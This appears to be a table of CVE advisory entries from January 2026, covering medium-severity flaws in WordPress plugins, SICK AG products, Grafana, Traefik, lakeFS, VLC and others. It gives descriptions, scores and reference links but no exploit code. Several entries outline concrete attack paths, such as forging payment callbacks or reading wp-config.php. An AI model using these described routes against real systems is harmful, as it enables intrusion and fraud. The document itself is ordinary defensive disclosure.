| searchwiz--SearchWiz | The SearchWiz plugin for WordPress is vulnerable to Stored Cross-Site Scripting via post titles in search results in all versions up to, and including, 1.0.0. This is due to the plugin using `esc_attr()` instead of `esc_html()` when outputting post titles in search results. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in post titles that will execute whenever a user performs a search and views the search results page. | 2026-01-14 | 6.4 | CVE-2026-0694 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3e60a315-7f74-4d81-b6d2-ad3d40d489ef?source=cve https://plugins.trac.wordpress.org/browser/searchwiz/trunk/public/class-sw-ajax.php#L616 https://plugins.trac.wordpress.org/browser/searchwiz/tags/1.0.0/public/class-sw-ajax.php#L616 |
| shoheitanaka--PAYGENT for WooCommerce | The PAYGENT for WooCommerce plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 2.4.6. This is due to missing authorization checks on the paygent_check_webhook function combined with the paygent_permission_callback function unconditionally returning true on line 199. This makes it possible for unauthenticated attackers to manipulate payment callbacks and modify order statuses by sending forged payment notifications via the `/wp-json/paygent/v1/check/` endpoint. | 2026-01-17 | 5.3 | CVE-2025-14078 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9de42bd9-a1d2-48f2-a594-4013a9490e25?source=cve https://plugins.trac.wordpress.org/browser/woocommerce-for-paygent-payment-main/trunk/includes/gateways/paygent/class-wc-paygent-endpoint.php#L199 https://plugins.trac.wordpress.org/browser/woocommerce-for-paygent-payment-main/tags/2.4.2/includes/gateways/paygent/class-wc-paygent-endpoint.php#L199 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3433179%40woocommerce-for-paygent-payment-main&new=3433179%40woocommerce-for-paygent-payment-main&sfp_email=&sfph_mail= https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3432342%40woocommerce-for-paygent-payment-main&new=3432342%40woocommerce-for-paygent-payment-main&sfp_email=&sfph_mail= |
| SICK AG--Incoming Goods Suite | The built-in XY Chart plugin is vulnerable to a DOM XSS vulnerability. A user with Editor permissions is able to modify such a panel in order to make it execute arbitrary JavaScript. | 2026-01-15 | 6.8 | CVE-2026-22637 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.pdf |
| SICK AG--Incoming Goods Suite | An access control vulnerability was discovered in Grafana OSS where an Organization administrator could permanently delete the Server administrator account. This vulnerability exists in the DELETE /api/org/users/ endpoint. The vulnerability can be exploited when an Organization administrator exists and the Server administrator is either not part of any organization or part of the same organization as the Organization administrator. Impact: Organization administrators can permanently delete Server administrator accounts; if the only Server administrator is deleted, the Grafana instance becomes unmanageable and no super-user permissions remain in the system, affecting all users, organizations, and teams managed in the instance. The vulnerability is particularly serious as it can lead to a complete loss of administrative control over the Grafana instance. | 2026-01-15 | 5.5 | CVE-2026-22640 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.pdf |
| SICK AG--Incoming Goods Suite | This vulnerability in Grafana's datasource proxy API allows authorization checks to be bypassed by adding an extra slash character in the URL path. Users with minimal permissions could gain unauthorized read access to GET endpoints in Alertmanager and Prometheus datasources. The issue primarily affects datasources that implement route-specific permissions, including Alertmanager and certain Prometheus-based datasources. | 2026-01-15 | 5 | CVE-2026-22641 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.pdf |
| SICK AG--Incoming Goods Suite | Certain requests pass the authentication token in the URL as string query parameter, making it vulnerable to theft through server logs, proxy logs and Referer headers, which could allow an attacker to hijack the user's session and gain unauthorized access. | 2026-01-15 | 5.3 | CVE-2026-22644 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.pdf |
| SICK AG--Incoming Goods Suite | The application discloses all used components, versions and license information to unauthenticated actors, giving attackers the opportunity to target known security vulnerabilities of used components. | 2026-01-15 | 5.3 | CVE-2026-22645 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.pdf |
| SICK AG--Incoming Goods Suite | Grafana is an open-source platform for monitoring and observability. The Grafana Alerting DingDing integration was not properly protected and could be exposed to users with Viewer permission. Fixed in versions 10.4.19+security-01, 11.2.10+security-01, 11.3.7+security-01, 11.4.5+security-01, 11.5.5+security-01, 11.6.2+security-01 and 12.0.1+security-01. | 2026-01-15 | 4.3 | CVE-2026-22639 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.pdf |
| SICK AG--Incoming Goods Suite | An open redirect vulnerability has been identified in Grafana OSS organization switching functionality. Prerequisites for exploitation: multiple organizations must exist in the Grafana instance, and the victim must be on a different organization than the one specified in the URL. | 2026-01-15 | 4.2 | CVE-2026-22642 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.pdf |
| SICK AG--Incoming Goods Suite | Certain error messages returned by the application expose internal system details that should not be visible to end users, providing attackers with valuable reconnaissance information (like file paths, database errors, or software versions) that can be used to map the application's internal structure and discover other, more critical vulnerabilities. | 2026-01-15 | 4.3 | CVE-2026-22646 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.pdf |
| SICK AG--TDC-X401GL | Firmware update files may expose password hashes for system accounts, which could allow a remote attacker to recover credentials and gain unauthorized access to the device. | 2026-01-15 | 5.3 | CVE-2026-22911 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf |
| SICK AG--TDC-X401GL | Improper validation of a login parameter may allow attackers to redirect users to malicious websites after authentication. This can lead to various risks, including stealing credentials from unsuspecting users. | 2026-01-15 | 4.3 | CVE-2026-22912 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf |
| SICK AG--TDC-X401GL | Improper handling of a URL parameter may allow attackers to execute code in a user's browser after login. This can lead to the extraction of sensitive data. | 2026-01-15 | 4.3 | CVE-2026-22913 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf |
| SICK AG--TDC-X401GL | An attacker with limited permissions may still be able to write files to specific locations on the device, potentially leading to system manipulation. | 2026-01-15 | 4.3 | CVE-2026-22914 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf |
| SICK AG--TDC-X401GL | An attacker with low privileges may be able to read files from specific directories on the device, potentially exposing sensitive information. | 2026-01-15 | 4.3 | CVE-2026-22915 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf |
| SICK AG--TDC-X401GL | An attacker with low privileges may be able to trigger critical system functions such as reboot or factory reset without proper restrictions, potentially leading to service disruption or loss of configuration. | 2026-01-15 | 4.3 | CVE-2026-22916 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf |
| SICK AG--TDC-X401GL | Improper input handling in a system endpoint may allow attackers to overload resources, causing a denial of service. | 2026-01-15 | 4.3 | CVE-2026-22917 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf |
| SICK AG--TDC-X401GL | An attacker may exploit missing protection against clickjacking by tricking users into performing unintended actions through maliciously crafted web pages, leading to the extraction of sensitive data. | 2026-01-15 | 4.3 | CVE-2026-22918 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf |
| sigstore--fulcio | Fulcio is a certificate authority for issuing code signing certificates for an OpenID Connect (OIDC) identity. Prior to 1.8.5, Fulcio's metaRegex() function uses an unanchored regex, allowing attackers to bypass MetaIssuer URL validation and trigger SSRF to arbitrary internal services. Since the SSRF can only trigger GET requests, the request cannot mutate state. The response from the GET request is not returned to the caller, so data exfiltration is not possible. A malicious actor could attempt to probe an internal network through Blind SSRF. This vulnerability is fixed in 1.8.5. | 2026-01-12 | 5.8 | CVE-2026-22772 | https://github.com/sigstore/fulcio/security/advisories/GHSA-59jp-pj84-45mr https://github.com/sigstore/fulcio/commit/eaae2f2be56df9dea5f9b439ec81bedae4c0978d |
| Skyjos--Owlfiles File Manager | Owlfiles File Manager 12.0.1 contains a cross-site scripting vulnerability that allows attackers to inject malicious scripts through the path parameter in HTTP server endpoints. Attackers can craft URLs targeting the download and list endpoints with embedded script tags to execute arbitrary JavaScript in users' browsers. | 2026-01-13 | 6.2 | CVE-2022-50891 | ExploitDB-51036 Vendor Homepage Official App Store Listing VulnCheck Advisory: Owlfiles File Manager 12.0.1 Cross-Site Scripting via HTTP Server |
| SMEWebify--WebErpMesv2 | WebErpMesv2 is a Resource Management and Manufacturing execution system Web for industry. Prior to 1.19, WebErpMesv2 contains a file upload validation bypass vulnerability in multiple controllers that allows authenticated users to upload arbitrary files, including PHP scripts, leading to Remote Code Execution (RCE). This vulnerability is identical in nature to CVE-2025-52130 but exists in different code locations that were not addressed by the original fix. This vulnerability is fixed in 1.19. | 2026-01-12 | 5.4 | CVE-2026-22789 | https://github.com/SMEWebify/WebErpMesv2/security/advisories/GHSA-64rv-f829-x6m4 https://github.com/SMEWebify/WebErpMesv2/commit/c9e7f4a85aeb774a0ea4b61ad57a51b941166b69 |
| smings--LEAV Last Email Address Validator | The LEAV Last Email Address Validator plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions <= 1.7.1. This is due to missing or incorrect nonce validation on the display_settings_page function. This makes it possible for unauthenticated attackers to modify plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-16 | 4.3 | CVE-2025-14853 | https://www.wordfence.com/threat-intel/vulnerabilities/id/93db56df-d21b-4788-84b2-7b28641b5a7a?source=cve https://plugins.trac.wordpress.org/browser/last-email-address-validator/trunk/includes/leav-settings-page.inc.php#L66 https://plugins.trac.wordpress.org/browser/last-email-address-validator/trunk/includes/leav-settings-page.inc.php#L2183 https://plugins.trac.wordpress.org/browser/last-email-address-validator/trunk/includes/leav-settings-page.inc.php#L257 |
| smub--All in One SEO Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic | The All in One SEO - Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the `/aioseo/v1/ai/credits` REST route in all versions up to, and including, 4.9.2. This makes it possible for authenticated attackers, with Contributor-level access and above, to disclose the global AI access token. | 2026-01-16 | 4.3 | CVE-2025-14384 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f47d53e1-42ac-425e-a6f2-901a6d26845d?source=cve https://plugins.trac.wordpress.org/changeset/3435276/all-in-one-seo-pack |
| socialchampio--SocialChamp with WordPress | The SocialChamp with WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.3. This is due to missing nonce validation on the wpsc_settings_tab_menu function. This makes it possible for unauthenticated attackers to modify plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-14 | 4.3 | CVE-2025-14846 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bdbb660b-19aa-4c68-865c-0a51b85d1e5a?source=cve https://plugins.trac.wordpress.org/browser/auto-post-to-social-media-wp-to-social-champ/tags/1.3.3/admin/class-wp-socialchamp-settings-init.php#L157 |
| softwarepub--hermes | hermes is an implementation of the HERMES workflow to automatize software publication with rich metadata. From 0.8.1 to before 0.9.1, hermes subcommands take arbitrary options under the -O argument. These have been logged in raw form. If users provide sensitive data such as API tokens (e.g., via hermes deposit -O invenio_rdm.auth_token SECRET), these are written to the log file in plain text, making them available to whoever can access the log file. This vulnerability is fixed in 0.9.1. | 2026-01-12 | 5.9 | CVE-2026-22798 | https://github.com/softwarepub/hermes/security/advisories/GHSA-jm5j-jfrm-hm23 https://github.com/softwarepub/hermes/commit/7f64f102e916c76dc44404b77ab2a80f5a4e59b1 https://github.com/softwarepub/hermes/commit/90cb86acd026e7841f2539ae7a1b284a7f263514 |
| specialk--User Submitted Posts Enable Users to Submit Posts from the Front End | The User Submitted Posts - Enable Users to Submit Posts from the Front End plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'usp_access' shortcode in all versions up to, and including, 20260110 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-16 | 6.4 | CVE-2026-0913 | https://www.wordfence.com/threat-intel/vulnerabilities/id/85bf7a1b-3c54-40c9-8f19-fcb9dd478a0e?source=cve https://plugins.trac.wordpress.org/browser/user-submitted-posts/tags/20251210/library/shortcode-access.php#L20 https://plugins.trac.wordpress.org/changeset/3439027/ |
| Spring--CLI VSCode Extension | The VSCode extension for Spring CLI is vulnerable to command injection, resulting in command execution on the user's machine. | 2026-01-14 | 6.8 | CVE-2026-22718 | https://spring.io/security/cve-2026-22718 |
| stylemix--Cost Calculator Builder | The Cost Calculator Builder plugin for WordPress is vulnerable to Unauthenticated Payment Status Bypass in all versions up to, and including, 3.6.9 only when used in combination with Cost Calculator Builder PRO. This is due to the complete_payment AJAX action being registered via wp_ajax_nopriv, making it accessible to unauthenticated users, and the complete() function only verifying a nonce without checking user capabilities or order ownership. Since nonces are exposed to all visitors via window.ccb_nonces in the page source, any unauthenticated attacker can mark any order's payment status as "completed" without actual payment. | 2026-01-16 | 5.3 | CVE-2025-14757 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b8415e5f-17a4-425c-ac28-5dd886d1bcf1?source=cve https://plugins.trac.wordpress.org/browser/cost-calculator-builder/tags/3.6.7/includes/classes/CCBOrderController.php#L408 https://plugins.trac.wordpress.org/browser/cost-calculator-builder/tags/3.6.7/includes/classes/CCBAjaxAction.php#L98 https://plugins.trac.wordpress.org/changeset/3437516/cost-calculator-builder/trunk/includes/classes/CCBOrderController.php?old=3426823&old_path=cost-calculator-builder%2Ftrunk%2Fincludes%2Fclasses%2FCCBOrderController.php |
| sweetdaisy86--RepairBuddy Repair Shop CRM & Booking Plugin for WordPress | The RepairBuddy - Repair Shop CRM & Booking Plugin for WordPress plugin for WordPress is vulnerable to Insecure Direct Object Reference due to missing capability checks on the wc_upload_and_save_signature_handler function in all versions up to, and including, 4.1116. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary signatures to any order in the system, potentially modifying order metadata and triggering unauthorized status changes. | 2026-01-17 | 5.3 | CVE-2026-0820 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1b2ad299-03b1-4b9e-a241-d2ad2d85c3ac?source=cve https://plugins.trac.wordpress.org/browser/computer-repair-shop/trunk/lib/includes/classes/class-wcrb_signature.php#L562 https://plugins.trac.wordpress.org/browser/computer-repair-shop/tags/4.1116/lib/includes/classes/class-wcrb_signature.php#L562 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3436356%40computer-repair-shop&new=3436356%40computer-repair-shop&sfp_email=&sfph_mail= |
| Syed Balkhi--WPForms | WPForms 1.7.8 contains a cross-site scripting vulnerability in the slider import search feature and tab parameter. Attackers can inject malicious scripts through the ListTable.php endpoint to execute arbitrary JavaScript in victim's browser. | 2026-01-13 | 6.1 | CVE-2020-36919 | ExploitDB-51152 WPForms Lite Plugin Homepage VulnCheck Advisory: WPForms 1.7.8 - Cross-Site Scripting (XSS) |
| techknowprime--Responsive Accordion Slider | The Responsive Accordion Slider plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'resp_accordion_silder_save_images' function in all versions up to, and including, 1.2.2. This makes it possible for authenticated attackers, with Contributor-level access and above, to modify any slider's image metadata including titles, descriptions, alt text, and links. | 2026-01-14 | 4.3 | CVE-2026-0635 | https://www.wordfence.com/threat-intel/vulnerabilities/id/55cfb2c6-ca3f-45b7-8cd9-a5a1c3783ae0?source=cve https://plugins.trac.wordpress.org/browser/responsive-accordion-slider/tags/1.2.2/includes/admin/class-ras-admin.php#L101 |
| Testa--Testa | Testa 3.5.1 contains a reflected cross-site scripting vulnerability in the login.php redirect parameter that allows attackers to inject malicious scripts. Attackers can craft a specially encoded payload in the redirect parameter to execute arbitrary JavaScript in victim's browser context. | 2026-01-13 | 6.1 | CVE-2022-50896 | ExploitDB-51023 Archived Product Homepage VulnCheck Advisory: Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS) |
| thimpress--Thim Blocks | The Gutenberg Thim Blocks - Page Builder, Gutenberg Blocks for the Block Editor plugin for WordPress is vulnerable to arbitrary file reads in all versions up to, and including, 1.0.1. This is due to insufficient path validation in the server-side rendering of the thim-blocks/icon block. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the contents of arbitrary files on the server via the 'iconSVG' parameter, which can contain sensitive information such as wp-config.php. | 2026-01-17 | 6.5 | CVE-2025-13725 | https://www.wordfence.com/threat-intel/vulnerabilities/id/80de464f-a4b0-4aaf-8869-f8d29a422bdb?source=cve https://plugins.trac.wordpress.org/browser/thim-blocks/trunk/inc/Gutenberg/Blocks/Icon/IconBlockType.php#L92 https://plugins.trac.wordpress.org/browser/thim-blocks/tags/1.0.1/inc/Gutenberg/Blocks/Icon/IconBlockType.php#L92 https://plugins.trac.wordpress.org/browser/thim-blocks/trunk/inc/Gutenberg/Blocks/Icon/IconBlockType.php#L97 https://plugins.trac.wordpress.org/browser/thim-blocks/tags/1.0.1/inc/Gutenberg/Blocks/Icon/IconBlockType.php#L97 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3424998%40thim-blocks&new=3424998%40thim-blocks&sfp_email=&sfph_mail= https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3419638%40thim-blocks&new=3419638%40thim-blocks&sfp_email=&sfph_mail= |
| thimpress--WP Hotel Booking | The WP Hotel Booking plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2.7. This is due to the plugin exposing the 'hotel_booking_fetch_customer_info' AJAX action to unauthenticated users without proper capability checks, relying only on a nonce for protection. This makes it possible for unauthenticated attackers to retrieve sensitive customer information including full names, addresses, phone numbers, and email addresses by providing a valid email address and a publicly accessible nonce. | 2026-01-17 | 5.3 | CVE-2025-14075 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1fc4eaec-b5d8-4707-9260-bac02a4b1866?source=cve https://plugins.trac.wordpress.org/browser/wp-hotel-booking/trunk/includes/class-wphb-ajax.php#L192 https://plugins.trac.wordpress.org/browser/wp-hotel-booking/tags/2.2.7/includes/class-wphb-ajax.php#L192 https://plugins.trac.wordpress.org/browser/wp-hotel-booking/tags/2.2.7/includes/class-wphb-ajax.php#L36 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3429399%40wp-hotel-booking&new=3429399%40wp-hotel-booking&sfp_email=&sfph_mail= |
| thundernest--ImportExportTools NG | ImportExportTools NG 10.0.4 contains a persistent HTML injection vulnerability in the email export module that allows remote attackers to inject malicious HTML payloads. Attackers can send emails with crafted HTML in the subject that execute during HTML export, potentially compromising user data or session credentials. | 2026-01-15 | 6.1 | CVE-2021-47768 | ExploitDB-50496 ImportExportTools NG GitHub Repository Thunderbird Addon Page Vulnerability-Lab Disclosure |
| torstenbulk--DK PDF WordPress PDF Generator | The DK PDF - WordPress PDF Generator plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.3.0 via the 'addContentToMpdf' function. This makes it possible for authenticated attackers, author level and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. | 2026-01-16 | 5 | CVE-2025-14793 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b062f72a-542c-4212-af83-4faefbf69bd7?source=cve https://plugins.trac.wordpress.org/browser/dk-pdf/trunk/modules/Frontend/WordPressIntegration.php?marks=22-25#L22 https://plugins.trac.wordpress.org/browser/dk-pdf/trunk/modules/PDF/Generator.php?marks=24-56#L24 https://plugins.trac.wordpress.org/browser/dk-pdf/tags/2.3.0/modules/PDF/DocumentBuilder.php#L213 https://plugins.trac.wordpress.org/browser/dk-pdf/tags/2.3.0/templates/dkpdf-index.php#L134 |
| traefik--traefik | Traefik is an HTTP reverse proxy and load balancer. Prior to 2.11.35 and 3.6.7, there is a potential vulnerability in Traefik ACME TLS certificates' automatic generation: the ACME TLS-ALPN fast path can allow unauthenticated clients to tie up go routines and file descriptors indefinitely when the ACME TLS challenge is enabled. A malicious client can open many connections, send a minimal ClientHello with acme-tls/1, then stop responding, leading to denial of service of the entry point. The vulnerability is fixed in 2.11.35 and 3.6.7. | 2026-01-15 | 5.9 | CVE-2026-22045 | https://github.com/traefik/traefik/security/advisories/GHSA-cwjm-3f7h-9hwq https://github.com/traefik/traefik/commit/e9f3089e9045812bcf1b410a9d40568917b26c3d https://github.com/traefik/traefik/releases/tag/v2.11.35 https://github.com/traefik/traefik/releases/tag/v3.6.7 |
| treeverse--lakeFS | lakeFS is an open-source tool that transforms object storage into Git-like repositories. lakeFS's S3 gateway does not validate timestamps in authenticated requests, allowing replay attacks. Prior to 1.75.0, an attacker who captures a valid signed request (e.g., through network interception, logs, or compromised systems) can replay that request until credentials are rotated, even after the request is intended to expire. This vulnerability is fixed in 1.75.0. | 2026-01-15 | 6.5 | CVE-2025-68671 | https://github.com/treeverse/lakeFS/security/advisories/GHSA-f2ph-gc9m-q55f https://github.com/treeverse/lakeFS/issues/9599 https://github.com/treeverse/lakeFS/commit/92966ae611d7f1a2bbe7fd56f9568c975aab2bd8 |
| Ttyplus--MTPutty | MTPutty 1.0.1.21 contains a sensitive information disclosure vulnerability that allows local attackers to view SSH connection passwords through Windows PowerShell process listing. Attackers can run a PowerShell command to retrieve the full command line of MTPutty processes, exposing plaintext SSH credentials. | 2026-01-15 | 6.2 | CVE-2021-47759 | ExploitDB-50574 Official MTPutty Product Homepage |
| Ubeeinteractive--Ubee EVW327 | Ubee EVW327 contains a cross-site request forgery vulnerability that allows attackers to enable remote access without user interaction. Attackers can craft a malicious webpage that automatically submits a form to change router remote access settings to port 8080 without the user's consent. | 2026-01-16 | 5.3 | CVE-2021-47820 | ExploitDB-49920 Ubee Interactive Official Homepage VulnCheck Advisory: Ubee EVW327 - 'Enable Remote Access' Cross-Site Request Forgery (CSRF) |
| umbraco--Umbraco | Umbraco CMS v8.14.1 contains a server-side request forgery vulnerability that allows attackers to manipulate baseUrl parameters in multiple dashboard and help controller endpoints. Attackers can craft malicious requests to the GetContextHelpForPage, GetRemoteDashboardContent, and GetRemoteDashboardCss endpoints to trigger unauthorized server-side requests to external hosts. | 2026-01-15 | 5.3 | CVE-2021-47776 | ExploitDB-50462 Umbraco Official Homepage Umbraco CMS Release Notes |
| Vertiv--Cyclades Serial Console Server | Cyclades Serial Console Server 3.3.0 contains a local privilege escalation vulnerability due to overly permissive sudo privileges for the admin user and admin group. Attackers can exploit the default user configuration to gain root access by manipulating system binaries and leveraging unrestricted sudo permissions. | 2026-01-13 | 6.2 | CVE-2022-50927 | ExploitDB-50773 Vertiv Official Homepage VulnCheck Advisory: Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation |
| VideoLAN--VLC media player | mmstu.c in VideoLAN VLC media player before 3.0.22 allows an out-of-bounds read and denial of service via a crafted 0x01 response from an MMS server. | 2026-01-16 | 4.8 | CVE-2025-51602 | https://www.videolan.org/security/sb-vlc3022.html https://code.videolan.org/videolan/vlc/-/issues/29146 |
| Visual-Tools--Visual Tools DVR VX16 | Visual Tools DVR VX16 version 4.2.28 contains a local privilege escalation vulnerability in its Sudo configuration that allows attackers to gain root access. Attackers can exploit the unsafe Sudo settings by using mount commands to bind a shell, enabling unauthorized system-level privileges. | 2026-01-15 | 6.2 | CVE-2021-47799 | ExploitDB-50104 Official Vendor Homepage |
| vk011--Real Post Slider Lite | The Real Post Slider Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin settings in all versions up to, and including, 2.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-14 | 4.4 | CVE-2026-0680 | https://www.wordfence.com/threat-intel/vulnerabilities/id/324fd823-8ec9-4187-8694-6160bad8e093?source=cve https://plugins.trac.wordpress.org/browser/real-post-slider-lite/trunk/real-post-slider-lite.php#L130 https://plugins.trac.wordpress.org/browser/real-post-slider-lite/tags/2.4/real-post-slider-lite.php#L130 |
| webbu--WMF Mobile Redirector | The WMF Mobile Redirector plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin settings in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-14 | 4.4 | CVE-2026-0739 | https://www.wordfence.com/threat-intel/vulnerabilities/id/037b5c2c-510a-4fa5-b489-cb0478603be2?source=cve https://plugins.trac.wordpress.org/browser/wmf-mobile-redirector/trunk/includes/options-page.php#L55 https://plugins.trac.wordpress.org/browser/wmf-mobile-redirector/tags/1.2/includes/options-page.php#L55 https://plugins.trac.wordpress.org/browser/wmf-mobile-redirector/trunk/includes/options-page.php#L62 https://plugins.trac.wordpress.org/browser/wmf-mobile-redirector/tags/1.2/includes/options-page.php#L62 |
